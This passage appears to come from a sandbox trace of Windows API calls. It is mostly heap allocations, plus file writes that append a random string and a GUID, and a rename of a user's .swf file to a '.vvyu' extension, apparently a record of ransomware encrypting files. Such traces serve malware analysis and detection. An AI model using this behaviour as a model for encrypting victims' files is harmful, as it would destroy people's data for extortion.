dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0188.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0188.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0188.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398c8 | out: hHeap=0x6a0000) returned 1 [0188.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0188.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39910 | out: hHeap=0x6a0000) returned 1 [0188.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0188.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398b0 | out: hHeap=0x6a0000) returned 1 [0188.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39880 | out: hHeap=0x6a0000) returned 1 [0188.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0188.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0188.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0188.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39868 | out: hHeap=0x6a0000) returned 1 [0188.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ef8 | out: hHeap=0x6a0000) returned 1 [0188.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0188.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0188.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0188.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0188.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0188.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0188.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0188.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0188.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0188.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0188.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0188.342] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x36ab, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x36ab, lpOverlapped=0x0) returned 1 [0188.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0188.342] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x36b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.343] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0188.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0188.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0188.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0188.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.344] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0188.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0188.344] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.344] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0188.345] CloseHandle (hObject=0x584) returned 1 [0188.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0188.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d2ec90 [0188.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0188.346] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\MpfQOqQiRBVBhaaAVOGl.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\mpfqoqqirbvbhaaavogl.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\MpfQOqQiRBVBhaaAVOGl.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\mpfqoqqirbvbhaaavogl.swf.vvyu")) returned 1 [0188.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0188.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.348] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0188.351] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72ba2a10, ftCreationTime.dwHighDateTime=0x1d8a2d0, ftLastAccessTime.dwLowDateTime=0xe4734960, ftLastAccessTime.dwHighDateTime=0x1d8a61e, ftLastWriteTime.dwLowDateTime=0xe4734960, ftLastWriteTime.dwHighDateTime=0x1d8a61e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PRpouSq", cAlternateFileName="")) returned 1 [0188.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0188.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0188.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x38) returned 0x2cbfa50 [0188.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0188.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0188.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0188.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0188.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0188.353] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72ba2a10, ftCreationTime.dwHighDateTime=0x1d8a2d0, ftLastAccessTime.dwLowDateTime=0xe4734960, ftLastAccessTime.dwHighDateTime=0x1d8a61e, ftLastWriteTime.dwLowDateTime=0xe4734960, ftLastWriteTime.dwHighDateTime=0x1d8a61e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PRpouSq", cAlternateFileName="")) returned 0 [0188.353] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0188.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0188.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0188.354] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0188.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b10 [0188.354] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0188.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0188.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0188.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | 